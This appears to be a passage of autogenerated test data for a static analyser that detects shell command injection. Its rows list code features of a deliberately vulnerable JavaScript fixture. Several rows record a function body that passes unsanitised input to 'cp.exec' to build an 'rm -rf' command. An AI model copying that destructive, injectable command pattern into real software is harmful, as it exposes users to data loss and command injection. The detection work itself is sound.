Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:23:141:32 | exceptional return of new Cla4() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:23:141:32 | exceptional return of new Cla4() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:23:141:32 | new Cla4() | assignedToPropName | cla4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:23:141:32 | new Cla4() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:23:141:32 | new Cla4() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:23:141:32 | new Cla4() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:27:141:30 | Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:27:141:30 | Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:27:141:30 | Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | cp | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | this | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:143:0 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | 'arguments' object of function Cla5 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | 'arguments' object of function Cla5 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | 'arguments' object of function Cla5 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | 'arguments' object of function Cla5 | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | 'arguments' object of function Cla5 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | exceptional return of function Cla5 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | exceptional return of function Cla5 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | exceptional return of function Cla5 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | exceptional return of function Cla5 | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | exceptional return of function Cla5 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | functio ... orted\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | functio ... orted\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | functio ... orted\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | return of function Cla5 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | return of function Cla5 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | return of function Cla5 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | return of function Cla5 | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:1:145:1 | return of function Cla5 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:10:143:13 | Cla5 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:10:143:13 | Cla5 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:10:143:13 | Cla5 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:10:143:13 | Cla5 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:10:143:13 | Cla5 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:10:143:13 | Cla5 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:143:15:143:18 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:3 | cp | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:8 | cp.exec | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | cp.exec ... + name) | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 